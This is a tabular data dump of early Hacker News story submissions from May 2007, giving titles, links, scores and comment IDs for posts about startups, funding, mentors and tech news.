18,749 | andre | 2007-05-02T16:40:49 | Russian Exact Copy of Facebook | null | http://vkontakte.ru/ | 2 | 4 | [
18763,
18765,
18750
] | null | null | null | null | null | null | null | null | null | train |
18,753 | mattjaynes | 2007-05-02T16:46:50 | 3 Reasons Why Wanna-Be Entrepreneurs Never Start Their Own Businesses | null | http://blog.yeabiz.com/2007/05/02/3-reasons-why-wanna-be-entrepreneurs-never-start-their-own-businesses/ | 2 | 1 | [
18788
] | null | null | null | null | null | null | null | null | null | train |
18,754 | mattjaynes | 2007-05-02T16:49:55 | How helpful are mentors? | null | http://scottgbradley.blogspot.com/2007/05/mentorsyou-cant-succeed-without-them.html | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,757 | transburgh | 2007-05-02T17:11:00 | How to Test Whether or not to Take on a Partner | null | http://www.gobignetwork.com/wil/2007/5/2/how-to-test-whether-or-not-to-take-on-a-partner/10144/view.aspx | 6 | 2 | [
18762
] | null | null | fetch failed | null | null | null | null | 2024-11-08T00:51:08 | null | train |
18,766 | ACSparks | 2007-05-02T17:34:29 | The World According to 37signals (6 min video interview with Jason Fried) | null | http://www.businesspov.com/article/199 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,767 | Readmore | 2007-05-02T17:36:08 | Joyent Slinghsot Released today | null | http://joyeur.com/2007/05/01/slingshot-public-release | 2 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,768 | msgbeepa | 2007-05-02T17:36:12 | Pligg released beta version 9.5 | null | http://www.media-sight.net/2007/05/pligg-released-beta-version-95.html | 1 | -1 | null | null | true | null | null | null | null | null | null | null | train |
18,770 | far33d | 2007-05-02T17:36:40 | A Greener Apple | null | http://www.apple.com/hotnews/agreenerapple/ | 2 | 1 | [
18891
] | null | null | null | null | null | null | null | null | null | train |
18,771 | mattjaynes | 2007-05-02T17:38:48 | Software Startups: 7 Signs The Industry Is Doing Well | null | http://onstartups.com/home/tabid/3339/bid/1429/Software-Startups-7-Signs-The-Industry-Is-Doing-Well.aspx | 3 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,773 | Mistone | 2007-05-02T17:42:25 | Employer Waiver of IP Rights related to an employees new venture | null | 1 | 1 | [
18775
] | null | null | invalid_url | null | null | null | null | 2024-11-08T16:37:59 | null | train |
|
18,778 | usablecontent | 2007-05-02T17:58:51 | Windows Live Calendar Coming Soon, Yeah Sure | null | http://startupmeme.com/2007/05/02/windows-live-calendar-coming-soon-yeah-sure/ | 2 | 1 | [
18783
] | null | null | null | null | null | null | null | null | null | train |
18,780 | mattjaynes | 2007-05-02T18:01:25 | 3 Ways To Fund Your Business: How To Finance A Startup For The Best Growth | null | http://www.thedigeratilife.com/blog/index.php/2007/04/19/3-ways-to-fund-your-business-how-to-finance-a-startup-for-the-best-growth/ | 1 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,785 | brett | 2007-05-02T18:12:50 | The Post Money Value: Remote Work vs. Remote Leadership | null | http://ricksegal.typepad.com/pmv/2007/05/remote_work_vs_.html | 6 | 0 | null | null | null | null | null | null | null | null | null | null | train |
18,786 | mattjaynes | 2007-05-02T18:14:19 | Top 10 Ways to Suffocate an Entrepreneurial Ecosystem | null | http://docs.google.com/Doc?id=ddr8jzqk_15frnwgb | 7 | 2 | [
18941,
18826
] | null | null | null | null | null | null | null | null | null | train |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.